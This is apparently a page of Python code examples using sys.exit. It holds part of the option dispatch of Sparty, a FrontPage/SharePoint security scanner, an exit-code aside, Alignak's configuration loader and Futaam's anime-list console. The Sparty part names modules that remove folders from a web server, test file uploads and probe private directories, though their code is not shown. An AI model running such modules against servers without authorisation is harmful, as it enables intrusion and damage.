                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_service_listing(target)
                        module_success("module RPC service listing check")
                        return

        elif options.exploit == "author_config_check":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] auditing frontpage configuration settings                               !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_config_check(target)
                        module_success("module RPC check")
                        return

        elif options.exploit == "author_remove_folder":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] trying to remove folder from web server                                 !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_remove_folder(target)
                        module_success("module remove folder check")
                        return


        elif options.exploit == "rpc_file_upload":
                print "\n[+]-----------------------------------------------------------------------!"
                print "[+] auditing file uploading misconfiguration                                !"
                print "[+]-------------------------------------------------------------------------!\n"
                file_upload_check(target)
                module_success("module file upload check")
                return


        elif options.examples == "examples":
                sparty_usage(target)
                return

        elif options.directory == "list" or options.directory == "index":
            build_target(target,directory_check,dir_target)
            print "\n[+]-----------------------------------------------------------------------!"
            print "[+] auditing frontpage directory permissions (forbidden | index | not exist)!"
            print "[+]-------------------------------------------------------------------------!\n"
            audit(dir_target)
            module_success("directory check")
            return

        elif options.frontpage == "bin":
            build_target(target,front_bin,refine_target)
            print "\n[+]----------------------------------------!"
            print "[+] auditing frontpage '/_vti_bin/' directory!"
            print "[+]------------------------------------------!\n"
            audit(refine_target)
            module_success("bin file access")

        elif options.frontpage == "pvt":
            build_target(target,front_pvt,pvt_target)
            print "\n[+]---------------------------------------------------------!"
            print "[+] auditing '/_vti_pvt/' directory for sensitive information !"
            print "[+]-----------------------------------------------------------!\n"
            audit(pvt_target)
            module_success("pvt file access")
            return

        elif options.fingerprint == "ms_sharepoint":
            dump_sharepoint_headers(target)
            print "\n[+] sharepoint fingerprinting module completed !\n"
            return


        elif options.fingerprint == "ms_frontpage":
            fingerprint_frontpage(target)
            print "\n[+] frontpage fingerprinting module completed !\n"
            return

        elif options.sharepoint == "layouts":
            build_target(target,sharepoint_check_layout,sharepoint_target_layout)
            print "\n[+]-----------------------------------------------------------------!"
            print "[+] auditing sharepoint '/_layouts/' directory for access permissions !"
            print "[+]-------------------------------------------------------------------!\n"
            audit(sharepoint_target_layout)
            module_success("layout file access")
            return

        elif options.sharepoint == "forms":
            build_target(target,sharepoint_check_forms,sharepoint_target_forms)
            print "\n[+]--------------------------------------------------------------!"
            print "[+] auditing sharepoint '/forms/' directory for access permissions !"
            print "[+]----------------------------------------------------------------!\n"
            audit(sharepoint_target_forms)
            module_success("forms file access")
            return

        elif options.sharepoint == "catalog":
            build_target(target,sharepoint_check_catalog,sharepoint_target_catalog)
            print "\n[+]--------------------------------------------------------------!"
            print "[+] auditing sharepoint '/catalog/' directory for access permissions !"
            print "[+]----------------------------------------------------------------!\n"
            audit(sharepoint_target_catalog)
            module_success("catalogs file access")
            return

        elif options.services == "serv" or options.services == "services":
            build_target(target,front_services,refine_target)
            print "\n[+]---------------------------------------------------------------!"
            print "[+] checking exposed services in the frontpage/sharepoint  directory!"
            print "[+]-----------------------------------------------------------------!\n"
            audit(refine_target)
            module_success("exposed services check")


        else:
            print "[-] please provide the proper scanning options!"
            print "[+] check help (-h) for arguments and url specification!"
            sys.exit(0)

    except ValueError as v:
        print "[-] ValueError occurred. Improper option argument or url!"
        print "[+] check for help (-h) for more details!"
        sys.exit(0)

    except TypeError as t:
        print "[-] TypeError occcured. Missing option argument or url!"
        print "[+] check for help (-h) for more details!"
        sys.exit(0)

    except IndexError as e:
        sparty_usage()
        sys.exit(0)

    except urllib2.HTTPError as h:
        print "[-] HTTPError : %s" %h.code
        print "[+] please specify the target with protocol handlers as http | https"
        sys.exit(0)

    except urllib2.URLError as u:
        print "[-] URLError : %s" %u.args
        print "[+] please specify the target with protocol handlers as http | https"
        sys.exit(0)

    except KeyboardInterrupt:
        print "[-] halt signal detected, exiting the program !\n"
        sys.exit(0)


    # note: 'except None' can never match a raised exception, so this final
    # handler is effectively dead code in the original tool
    except None:
        print "[] Hey"
        sys.exit(0)
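
One thing worth noting about the example above: its exception handlers all call sys.exit(0), so the process reports success to the calling shell even when the scan aborts on an error. A minimal sketch of the more conventional pattern is shown below; run_scan() is a hypothetical placeholder for the tool's option dispatch, not part of the original source.

import sys

def run_scan():
    # hypothetical placeholder for option parsing and dispatch
    raise RuntimeError("scan failed")

def main():
    try:
        run_scan()
    except KeyboardInterrupt:
        sys.stderr.write("[-] halt signal detected, exiting\n")
        sys.exit(130)                  # 128 + SIGINT, the usual shell convention
    except Exception as err:
        sys.stderr.write("[-] error: %s\n" % err)
        sys.exit(1)                    # non-zero tells the caller the scan failed
    sys.exit(0)                        # zero only on success

if __name__ == "__main__":
    main()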

Example 43

Project: alignak
Source File: arbiterdaemon.py
View license
    def load_monitoring_config_file(self):  # pylint: disable=R0915
        """Load main configuration file (alignak.cfg)::

        * Read all files given in the -c parameters
        * Read all .cfg files in cfg_dir
        * Read all files in cfg_file
        * Create objects (Arbiter, Module)
        * Set HTTP links info (ssl etc)
        * Load its own modules
        * Execute read_configuration hook (for arbiter modules)
        * Create all objects (Service, Host, Realms ...)
        * "Compile" configuration (Linkify, explode, apply inheritance, fill default values ...)
        * Cut conf into parts and prepare it for sending

        :return: None
        """
        if self.verify_only:
            # Force the global logger at INFO level
            alignak_logger = logging.getLogger("alignak")
            alignak_logger.setLevel(logging.INFO)
            logger.info("Arbiter is in configuration check mode")
            logger.info("-----")

        logger.info("Loading configuration")
        # REF: doc/alignak-conf-dispatching.png (1)
        buf = self.conf.read_config(self.config_files)
        raw_objects = self.conf.read_config_buf(buf)
        # Maybe conf is already invalid
        if not self.conf.conf_is_correct:
            err = "***> One or more problems was encountered while processing the config files..."
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        logger.info("I correctly loaded the configuration files")

        # First we need to get arbiters and modules
        # so we can ask them for objects
        self.conf.create_objects_for_type(raw_objects, 'arbiter')
        self.conf.create_objects_for_type(raw_objects, 'module')

        self.conf.early_arbiter_linking()

        # Search which Arbiterlink I am
        for arb in self.conf.arbiters:
            if arb.get_name() in ['Default-Arbiter', self.config_name]:
                arb.need_conf = False
                self.myself = arb
                self.is_master = not self.myself.spare
                if self.is_master:
                    logger.info("I am the master Arbiter: %s", arb.get_name())
                else:
                    logger.info("I am a spare Arbiter: %s", arb.get_name())
                # export this data to our statsmgr object :)
                statsd_host = getattr(self.conf, 'statsd_host', 'localhost')
                statsd_port = getattr(self.conf, 'statsd_port', 8125)
                statsd_prefix = getattr(self.conf, 'statsd_prefix', 'alignak')
                statsd_enabled = getattr(self.conf, 'statsd_enabled', False)
                statsmgr.register(arb.get_name(), 'arbiter',
                                  statsd_host=statsd_host, statsd_port=statsd_port,
                                  statsd_prefix=statsd_prefix, statsd_enabled=statsd_enabled)

                # Set myself as alive ;)
                self.myself.alive = True
            else:  # not me
                arb.need_conf = True

        if not self.myself:
            sys.exit("Error: I cannot find my own Arbiter object (%s), I bail out. "
                     "To solve this, please change the arbiter_name parameter in "
                     "the arbiter configuration file (certainly arbiter-master.cfg) "
                     "with the value '%s'."
                     " Thanks." % (self.config_name, socket.gethostname()))

        # Ok it's time to load the module manager now!
        self.load_modules_manager()
        # we request the instances without them being *started*
        # (for those that are concerned ("external" modules):
        # we will *start* these instances after we have been daemonized (if requested)
        self.do_load_modules(self.myself.modules)

        # Call modules that manage this read configuration pass
        self.hook_point('read_configuration')

        # Call modules get_objects() to load new objects from them
        # (example modules: glpi, mongodb, dummy_arbiter)
        self.load_modules_configuration_objects(raw_objects)

        # Resume standard operations
        self.conf.create_objects(raw_objects)

        # Maybe conf is already invalid
        if not self.conf.conf_is_correct:
            err = "***> One or more problems was encountered while processing the config files..."
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        # Manage all post-conf modules
        self.hook_point('early_configuration')

        # Load all file triggers
        self.conf.load_triggers()

        # Create Template links
        self.conf.linkify_templates()

        # All inheritances
        self.conf.apply_inheritance()

        # Explode between types
        self.conf.explode()

        # Implicit inheritance for services
        self.conf.apply_implicit_inheritance()

        # Fill default values
        self.conf.fill_default()

        # Remove templates from config
        self.conf.remove_templates()

        # Overrides specific service instances properties
        self.conf.override_properties()

        # Linkify objects to each other
        self.conf.linkify()

        # applying dependencies
        self.conf.apply_dependencies()

        # Hacking some global parameters inherited from Nagios to create
        # on the fly some Broker modules like for status.dat parameters
        # or nagios.log one if there are none already available
        self.conf.hack_old_nagios_parameters()

        # Raise warning about currently unmanaged parameters
        if self.verify_only:
            self.conf.warn_about_unmanaged_parameters()

        # Explode global conf parameters into Classes
        self.conf.explode_global_conf()

        # set our own timezone and propagate it to other satellites
        self.conf.propagate_timezone_option()

        # Look for business rules, and create the dep tree
        self.conf.create_business_rules()
        # And link them
        self.conf.create_business_rules_dependencies()

        # Warn about useless parameters in Alignak
        if self.verify_only:
            self.conf.notice_about_useless_parameters()

        # Manage all post-conf modules
        self.hook_point('late_configuration')

        # Configuration is correct?
        self.conf.is_correct()

        # Maybe some elements were not wrong, so we must clean if possible
        self.conf.clean()

        # If the conf is not correct, we must get out now (do not try to split the configuration)
        if not self.conf.conf_is_correct:
            err = "Configuration is incorrect, sorry, I bail out"
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        # REF: doc/alignak-conf-dispatching.png (2)
        logger.info("Splitting hosts and services into parts")
        self.confs = self.conf.cut_into_parts()

        # The conf can be incorrect here if the cut into parts see errors like
        # a realm with hosts and no schedulers for it
        if not self.conf.conf_is_correct:
            err = "Configuration is incorrect, sorry, I bail out"
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        logger.info('Things look okay - No serious problems were detected '
                    'during the pre-flight check')

        # Clean objects of temporary/unnecessary attributes for live work:
        self.conf.clean()

        # Exit if we are just here for config checking
        if self.verify_only:
            logger.info("Arbiter checked the configuration")
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(0)

        if self.analyse:
            self.launch_analyse()
            sys.exit(0)

        # Some properties need to be "flatten" (put in strings)
        # before being sent, like realms for hosts for example
        # BEWARE: after the cutting part, because we stringify some properties
        self.conf.prepare_for_sending()

        # Ignore daemon configuration parameters (port, log, ...) in the monitoring configuration
        # It's better to use daemon default parameters rather than host found in the monitoring
        # configuration...

        self.accept_passive_unknown_check_results = BoolProp.pythonize(
            getattr(self.myself, 'accept_passive_unknown_check_results', '0')
        )

        #  We need to set self.host & self.port to be used by do_daemon_init_and_start
        self.host = self.myself.address
        self.port = self.myself.port

        logger.info("Configuration Loaded")

        # Still a last configuration check because some things may have changed when
        # we prepared the configuration for sending
        if not self.conf.conf_is_correct:
            err = "Configuration is incorrect, sorry, I bail out"
            logger.error(err)
            # Display found warnings and errors
            self.conf.show_errors()
            sys.exit(err)

        # Display found warnings and errors
        self.conf.show_errors()
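
A detail this example leans on: sys.exit() accepts either an integer or any other object. An integer becomes the process exit status directly, while a non-integer argument (such as the err strings above) is printed to stderr and the exit status is set to 1. Below is a small standalone sketch of both forms; the check() helper and its errors list are illustrative only, not taken from alignak.

import sys

def check(errors):
    # sys.exit(0)          -> status 0, prints nothing
    # sys.exit(2)          -> status 2, prints nothing
    # sys.exit("message")  -> writes "message" to stderr, exit status 1
    if errors:
        sys.exit("Configuration is incorrect, sorry, I bail out")
    sys.exit(0)

if __name__ == "__main__":
    check([])   # illustrative call; pass a non-empty list to exercise the error path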

Example 44

Project: Futaam
Source File: text.py
View license
def main(argv, version):
    """The text interface's main method."""
    global PS1
    ANNInitRet = ANN.init()
    if ANNInitRet == 0:
        pass
    elif ANNInitRet == 1:
        print(COLORS.header + 'Updating metadata...' + COLORS.default)
        ANN.fetch_report(50)
    elif ANNInitRet == 2:
        print(COLORS.header + 'Updating ANN metadata cache for the first time...' + COLORS.default)
        ANN.fetch_report('all')
	
    # gather arguments
    dbfile = ARGS.database
    host = ''
    if ARGS.host:
        host = ARGS.host
    password = ''
    if ARGS.password:
        password = ARGS.password
    username = ''
    if ARGS.username:
        username = ARGS.username
    port = 8500
    if ARGS.port:
        port = ARGS.port
    hooks = []
    if ARGS.hooks:
        hooks = ARGS.hooks

    if len(dbfile) == 0 and host == '':
        print(COLORS.fail + 'No database specified' + COLORS.default)
        print('To create a database, use the argument "--create" or "-c"' +\
		'(no quotes)')
        sys.exit(1)

    if host == '':
        dbs = []
        for filename in dbfile:
            dbs.append(parser.Parser(filename, hooks=hooks))
        currentdb = 0
    else:
        if username == '':
            if 'default.user' in CONFS:
                print('[' + COLORS.blue + 'info' + COLORS.default +\
				'] using default user')
                username = CONFS['default.user']
            else:
                username = input('Username for \'' + host + '\': ')
        if 'default.password' in CONFS:
            print('[' + COLORS.blue + 'info' + COLORS.default +\
            '] using default password')
            password = CONFS['default.password']
        else:
            password = getpass.getpass(
                'Password for \'' + username + '@' + host + '\': ')
        dbs = []
        try:
            dbs.append(
                parser.Parser(host=host, port=port, username=username,
				password=password, hooks=hooks))
        except Exception as exception:
            print('[' + COLORS.fail + 'error' + COLORS.default + '] ' +\
			str(exception).replace('305 ', ''))
            sys.exit(1)

        currentdb = 0

    print(COLORS.header + dbs[currentdb].dictionary['name'] + COLORS.default +\
	' (' + dbs[currentdb].dictionary['description'] + ')')
    print('Type help for cheat sheet')
    if len(dbs) > 1:
        print('Type switchdb to change to the next database')
    sys.stdout.write('\n')

    while True:
        try:
            now = datetime.datetime.now()
            ps1_replace = {'%N': dbs[currentdb].dictionary['name'], '%D':
			dbs[currentdb].dictionary['description'], '%h': now.strftime('%H'),
			'%m': now.strftime('%M'), chr(37) + 's': now.strftime(
            '%S'), '%blue%': COLORS.blue, '%green%': COLORS.green, '%red%':
			COLORS.fail, '%orange%': COLORS.warning, '%purple%': COLORS.header,
			'%default%': COLORS.default}
            ps1_temp = PS1
            ps1_temp = ps1_temp.replace('\%', '%' + chr(5))
            for replacer in ps1_replace:
                ps1_temp = ps1_temp.replace(replacer, ps1_replace[replacer])
            ps1_temp = ps1_temp.replace(chr(5), '')
            cmd = input(ps1_temp + COLORS.default).lstrip()
            cmdsplit = cmd.split(' ')
            args = ''
            for arg in cmdsplit[1:]:
                args += arg + ' '
            args = args[:-1].replace('\n', '')
        except (EOFError, KeyboardInterrupt):
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)

        if cmdsplit[0].lower() in ['q', 'quit']:
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)
        elif cmdsplit[0].lower() in ['set_ps1', 'sps1']:
            args += ' '

            CONFS['PS1'] = args
            with open(CONFPATH, 'wb') as conf_file:
                conf_file.write(json.dumps(CONFS))
                conf_file.close()
            PS1 = args
        elif cmdsplit[0].lower() in ['help', 'h']:
            print(COLORS.header + 'Commands' + COLORS.default)
            print('\thelp or h \t\t - prints this')
            print('\tquit or q \t\t - quits')
            print('\tset_ps1 or sps1 \t - changes PS1')
            print('\tswitchdb or sdb \t - changes working database when' +\
			'opened with multiple files')
            print('\tadd or a \t\t - adds an entry')
            print('\tlist or ls\t\t - lists all entries')
            print('\tdelete, del or d \t - deletes an entry with the given' +\
			'index')
            print('\tedit or e \t\t - edits an entry')
            print('\tinfo or i\t\t - shows information on an entry')
            print('\toinfo or o\t\t - shows online information on an entry' +\
			'(if given entry number) or name')
            print('\tpicture, pic, image, img - shows an image of the entry' +\
			'or name')
            print('\tnyaa or n\t\t - searches nyaa.eu for torrent of an' +\
			'entry (if given entry number) or name')
            print('\tsort or s\t\t - swaps or moves entries around')
            print('\tfilter, f or search\t - searches the database (by' +\
			'name/genre/obs/type/lastwatched)')
            print('')
        elif cmdsplit[0].lower() in ['switchdb', 'sdb']:
            try:
                currentdb += 1
                repr(dbs[currentdb])
            except IndexError:
                currentdb = 0
            print('Current database: ' + COLORS.header + dbs[
			currentdb].dictionary['name'] + COLORS.default + ' (' + dbs[
			currentdb].dictionary['description'] + ')')
        elif cmdsplit[0].lower() in ['l', 'ls', 'list']:
            if len(dbs[currentdb].dictionary['items']) == 0:
                print(COLORS.warning +\
				'No entries found! Use "add" for adding one' + COLORS.default)
                continue
            else:
                for entry in sorted(dbs[currentdb].dictionary['items'],
				key=lambda x: x['id']):
                    rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                     COLORS.green, 'h': COLORS.warning, 'q': COLORS.header}

                    if entry['status'].lower() in rcolors:
                        sys.stdout.write(rcolors[entry['status'].lower()])
                    if os.name != 'nt':
                        print('\t' + str(entry['id']) + ' - [' +\
						entry['status'].upper() + '] ' + entry['name'] +\
						COLORS.default)
                    else:
                        print('\t' + str(entry['id']) +\
						' - [' + entry['status'].upper() + '] ' +\
						entry['name'].encode('ascii', 'ignore') +\
						COLORS.default)
        elif cmdsplit[0].lower() in ['search', 'filter', 'f']:
            if len(cmdsplit) < 3:
                print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                print('Where <filter> is' +\
				'name/genre/lastwatched/status/obs/type')
            else:
                if cmdsplit[1].lower() in ['name', 'genre', 'lastwatched',
				'status', 'obs', 'type']:
                    for entry in sorted(dbs[currentdb].dictionary['items'], \
					key=lambda x: x['id']):
                        if ' '.join(cmdsplit[2:]).lower() in \
						entry[cmdsplit[1].lower()].lower():
                            rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                                       COLORS.green, 'h': COLORS.warning, 'q':
									   COLORS.header}

                            if entry['status'].lower() in rcolors:
                                sys.stdout.write(
                                    rcolors[entry['status'].lower()])
                            if os.name != 'nt':
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'] + COLORS.default)
                            else:
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'].encode('ascii', 'ignore') +\
								COLORS.default)
                else:
                    print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                    print('Where <filter> is name/genre/lastwatched/status/obs')
        elif cmdsplit[0].lower() in ['d', 'del', 'delete']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue
            confirm = ''
            while (confirm in ['y', 'n']) == False:
                confirm = input(
                    COLORS.warning + 'Are you sure? [y/n] ' +\
					COLORS.default).lower()
            dbs[currentdb].dictionary['items'].remove(entry)
            dbs[currentdb].dictionary['count'] -= 1

            rebuild_ids(dbs[currentdb])

        elif cmdsplit[0].lower() in ['image', 'img', 'picture', 'pic', 'pix']:
            accepted = False
            if args.isdigit():
                if int(args) >= 0 and len(dbs[currentdb].dictionary['items']) >=\
                int(args):
                    eid = dbs[currentdb].dictionary['items'][int(
                    args)]['aid']
                    etype = dbs[currentdb].dictionary[
                    'items'][int(args)]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args +\
				    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                    COLORS.bold + '<Anime, Manga or VN> ' +\
                    COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                   'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii',
                            'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default
                    ).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]
                            eid = malanime['id']
                            etype = entry_type
                            accepted = True
            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                    'vn', 'basic,details', '(id=' + str(eid) + ')', '')\
                    ['items'][0]
                print(COLORS.header + 'Fetching image, please stand by...' +\
				COLORS.default)
                utils.showImage(
                deep[('image_url' if etype != 'vn' else 'image')])
        
        elif cmdsplit[0].lower() in ['s', 'sort']:
            if len(cmdsplit) != 4:
                print('Invalid number of arguments')
                print('Must be:')
                print('	(s)ort [(s)wap/(m)ove] [index] [index]')
                print('')
                print('When moving, first index should be "from entry" and' +\
				'second index should be "to entry"')
                continue

            if (cmdsplit[2].isdigit() == False) or\
			(cmdsplit[3].isdigit() == False):
                print(COLORS.fail + 'Indexes must be digits' + COLORS.default)
                continue

            if cmdsplit[1].lower() in ['swap', 's']:
                # Swap ids
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[2])]['id'] = int(cmdsplit[3])
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[3])]['id'] = int(cmdsplit[2])

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Save
                dbs[currentdb].save()
            elif cmdsplit[1].lower() in ['move', 'm']:
                # Fool ids
                dbs[currentdb].dictionary['items'][int(cmdsplit[2])][
                    'id'] = float(str(int(cmdsplit[3]) - 1) + '.5')

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Rebuild ids now that we have them in order
                rebuild_ids(dbs[currentdb])

            else:
                print(COLORS.warning + 'Usage: (s)ort [(s)wap/(m)ove]' +\
                '[index] [index]' + COLORS.default)
                continue

        elif cmdsplit[0].lower() in ['info', 'i']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            if entry['type'].lower() in ['anime', 'manga']:
                if entry['type'].lower() == 'anime':
                    t_label = 'Last watched'
                else:
                    t_label = 'Last chapter/volume read'
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], t_label:
                           entry['lastwatched'], 'Status':
                           utils.translated_status[entry['type']][entry[
                           'status'].lower()]}
            elif entry['type'].lower() == 'vn':
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], 'Status':
                            utils.translated_status[entry['type']][entry[
                            'status'].lower()]}

            for k in toprint:
                if os.name != 'nt':
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    str(toprint[k]))
                else:
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    toprint[k].encode('ascii', 'ignore'))

        elif cmdsplit[0].lower() in ['edit', 'e']:
            # INTRO I
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            # INTRO II
            if os.name != 'nt':
                n_name = input(
                    '<Name> [' + entry['name'].encode('utf8') + '] ').replace(
                    '\n', '')
            else:
                n_name = input(
                    '<Name> [' + entry['name'].encode('ascii', 'ignore') + '] '
                    ).replace('\n', '')

            if entry['type'].lower() != 'vn':
                n_genre = input(
                    '<Genre> [' + entry['genre'].decode('utf8') + '] '
                    ).replace('\n', '')
            else:
                n_genre = ''

            # ZIGZAGGING
            n_lw = None
            n_status = None
            if entry['type'] == 'anime':
                n_status = "placeholder"
                while (n_status in ['w', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [W/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                n_lw = input(
                    '<Last episode watched> [' + entry['lastwatched'] +\
                    ']>'.replace('\n', ''))
            elif entry['type'] == 'manga':
                n_status = "placeholder"
                while (n_status in ['r', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [R/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'r':
                    n_status = 'w'
                n_lw = input(
                    '<Last page/chapter read> [' + entry['lastwatched'] +\
                    ']> ').replace('\n', '')
            elif entry['type'] == 'vn':
                n_status = "placeholder"
                while (n_status in ['p', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [P/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'p':
                    n_status = 'w'
                n_lw = ''

            # EXTENDED SINGLE NOTE
            n_obs = input('<Observations> [' + entry['obs'] + ']> ')

            # BEGIN THE SOLO
            if n_name == '':
                n_name = entry['name']
            dbs[currentdb].dictionary['items'][int(args)]['name'] =\
            utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_name))
            if n_genre == '' and entry['type'].lower() != 'vn':
                n_genre = entry['genre']
            if entry['type'].lower() != 'vn':
                dbs[currentdb].dictionary['items'][int(args)]['genre'] =\
                utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_genre))
            if n_status != None:
                if n_status == '':
                    n_status = entry['status']
                dbs[currentdb].dictionary['items'][
                    int(args)]['status'] = n_status
                if n_lw == '':
                    n_lw = entry['lastwatched']
                dbs[currentdb].dictionary['items'][
                    int(args)]['lastwatched'] = n_lw
            if n_obs == '':
                n_obs = entry['obs']
            dbs[currentdb].dictionary['items'][int(args)]['obs'] = n_obs

            # Peaceful end
            dbs[currentdb].save()
            print(COLORS.green + 'Done' + COLORS.default)
            continue
        elif cmdsplit[0].lower() in ['n', 'nyaa']:
            if args.isdigit():
                if int(args) >= 0 and\
                len(dbs[currentdb].dictionary['items']) >= int(args):
                    term = dbs[currentdb].dictionary[
                        'items'][int(args)]['name']

                    if dbs[currentdb].dictionary['items'][int(args)]['type'\
                    ].lower() == 'anime':
                        if dbs[currentdb].dictionary['items'][int(args)][\
                        'status'].lower() == 'c':
                            if dbs[currentdb].dictionary['items'][int(args)][\
                            'lastwatched'].isdigit():
                                choice = ''
                                while (choice in ['y', 'n']) == False:
                                    choice = input(COLORS.bold +\
	                                'Do you want to search for the next' +\
                                     'episode (' + str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1) +\
                                        ')? [Y/n] ' + COLORS.default).lower()
                                    if choice.replace('\n', '') == '':
                                        choice = 'y'

                                if choice == 'y':
                                    new_lw = str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1)
                                    if len(str(new_lw)) == 1:
                                        new_lw = '0' + new_lw
                                    term = term + ' ' + new_lw

                else:
                    print(COLORS.fail + 'The entry ' + args +\
                    ' is not on the list' + COLORS.default)
                    continue
            else:
                term = args

            print(COLORS.header + 'Searching NYAA.eu for "' + term +\
            '"...' + COLORS.default)
            search_results = NYAA.search(term)
            print('')

            if len(search_results) == 0:
                print(COLORS.fail + 'No results found' + COLORS.default)
                continue

            i = 0
            for result in search_results[:15]:
                if os.name != 'nt':
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                else:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'].encode('ascii', 'ignore'))
                i += 1
            print('[C] Cancel')

            has_picked = False
            while has_picked == False:  # Ugly I know
                which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                if which.lower() == 'c':
                    break

                if which.isdigit():
                    if int(which) <= len(search_results) and int(which) <= 15:
                        picked = search_results[int(which)]
                        has_picked = True

            if has_picked:
                print('')
                if os.name == 'nt':
                    for key in picked:
                        picked[key] = picked[key].encode('ascii', 'ignore')
                print(COLORS.bold + '<Title> ' + COLORS.default +\
                picked['title'])
                print(COLORS.bold + '<Category> ' + COLORS.default +\
                picked['category'])
                print(COLORS.bold + '<Info> ' + COLORS.default +\
                picked['description'])
                print(COLORS.bold + '<URL> ' + COLORS.default + picked['url'])

                print('')
                choice = ''
                while (choice in ['t', 'd', 'n', 'r']) == False:
                    print(COLORS.bold + '[T] ' + COLORS.default +\
                    'Download .torrent file')
                    print(COLORS.bold + '[D] ' + COLORS.default +\
                    'Download all files (simple torrent client)')
                    print(COLORS.bold + '[R] ' + COLORS.default +\
                    'Load and start on rTorrent (xmlrpc)')
                    print(COLORS.bold + '[N] ' + COLORS.default +\
                    'Do nothing')
                    choice = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).lower()

                if choice == 'r':
                    if os.name == 'nt':
                        print(COLORS.fail + 'Not available on Windows' +\
                        COLORS.default)
                        continue

                    try:
                        server = rtorrent_xmlrpc.SCGIServerProxy(
                            'scgi://localhost:5000/')
                        time.sleep(1)
                        server.load_start(picked['url'])
                        time.sleep(.5)
                        print(COLORS.green + 'Success' + COLORS.default)
                    except:
                        print(COLORS.fail + 'Error while connecting or adding'+\
                        'torrent to rTorrent' + COLORS.default)
                        print(COLORS.warning + 'ATTENTION: for this to work' +\
                        'you need to add the following line to ~/.rtorrent.rc:')
                        print('\tscgi_port = localhost:5000')
                        print('')
                        print('And rTorrent needs to be running' +\
                        COLORS.default)
                        continue
                elif choice == 't':
                    metadata = urlopen(picked['url']).read()

                    while True:
                        filepath = input(
                            COLORS.bold + 'Save to> ' +\
                            COLORS.default).replace('\n', '')
                        try:
                            metadata_file = open(filepath, 'wb')
                            metadata_file.write(metadata)
                            metadata_file.close()
                        except IOError as error:
                            print(COLORS.fail + 'Failed to save file' +\
                            COLORS.default)
                            print(COLORS.fail + 'Exception! ' + str(error) +\
                            COLORS.default)
                            print('Retrying...')
                            print('')
                            continue
                        break

                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][
                            int(args)]['lastwatched'].isdigit():
                                print(COLORS.fail + 'The last watched field' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(
                                    int(dbs[currentdb].dictionary['items'][
                                    int(args)]['lastwatched']) + 1)
